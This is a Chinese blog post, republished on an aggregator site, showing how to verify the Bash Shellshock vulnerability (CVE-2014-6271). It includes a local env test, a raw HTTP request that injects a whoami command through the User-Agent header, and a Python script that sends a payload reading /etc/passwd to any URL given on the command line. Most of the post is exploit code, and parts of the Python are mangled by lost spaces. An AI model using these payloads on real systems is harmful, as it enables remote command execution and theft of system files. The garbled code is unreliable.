美文网首页
破壳漏洞(cve-2014-6271)

破壳漏洞(cve-2014-6271)

作者: 喵了个咪0 | 来源:发表于2020-03-07 16:07 被阅读0次

0x01本地漏洞验证

    Bash版本小于等于4.3可能存在漏洞

    可以使用如下命令查看bash版本:

root@kali:~#bash --version

    本地验证,使用如下命令:

root@kali:~#env x='() { :;}; echo vulnerable' bash –c "echo This is a test"

若存在漏洞,将会回显:

vulnerable

This is a test

0x02远程验证

GET / HTTP/1.1

Host:xxxx.xxx.xxx.xxx

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: () { :; }; echo; echo `whoami`;

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Connection: close

0x03python3验证

import

requests

importargparse

# 获取参数

parser = argparse.ArgumentParser()

parser.add_argument('-u', dest="url")

args = parser.parse_args()

url = args.url

# 设置headers,进行验证

headers = {'user-agent':'() { :;}; echo `/bin/cat /etc/passwd`'}

try:

    r = requests.get(url, headers=headers)

if(r.status_code == requests.codes.ok):

        dict_r = r.headers.items()

forkey, valueindict_r:

print("{}: {}".format(key, value))

exceptExceptionase:

    print(str(e))

相关资料:https://www.freebuf.com/news/48331.html

相关文章

  • CVE-2014-6271

    Shellshock 破壳漏洞(CVE-2014-6271) 1.漏洞影响版本 GNU BASH 1.14.0-1...

  • MSF之linux漏洞

    谈谈碰到的错误 Bash Shellshock CVE-2014-6271(破壳) 这个漏洞要注意的地方千万不要复...

  • 破壳漏洞 CVE-2014-6271

    下载bee-box V1.6版本虚拟机,里面有各种漏洞来进行练习。 登录用户名、密码为bee/bug 查看源代码。...

  • 破壳漏洞(cve-2014-6271)

    0x01本地漏洞验证 Bash版本小于等于4.3可能存在漏洞 可以使用如下命令查看bash版本: root...

  • 破壳漏洞利用与修复(shellshock CVE-2014-62

    环境安装 由于工作环境中一台Redhat 5.5 服务器上存在破壳漏洞(CVE-2014-6271)漏洞,相关漏洞...

  • Bash破壳漏洞(CVE-2014-6271)

    漏洞范围: GNU Bash 版本小于等于4.3 漏洞成因: bash使用的环境变量是通过函数名称来调用的,导致漏...

  • Vulnhub靶机:Symfonos3.1

    标签:shellshock破壳、CVE-2014-6271、嗅探ftp数据包、python提权 0x00 环境准备...

  • 墨者学院 - Bash漏洞分析溯源

    分析 漏洞编号: CVE-2014-6271 漏洞名称: Linux Bash远程可执行漏洞 漏洞影响范围: 所有...

  • Shocker

    bash破壳漏洞 sudo -l 内容 sudo -e参数使用 然后爆破的速度让你崩溃...dirb http:/...

  • 应用签名-命令签名

    获取破壳应用 手动签名是对破壳后的应用进行签名,应用破壳有两种:1、通过越狱手机获取破壳应用;2、通过PP助手获取...

网友评论

      本文标题:破壳漏洞(cve-2014-6271)

      本文链接:https://www.haomeiwen.com/subject/mrgynctx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|破壳漏洞(cve-2014-6271)|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!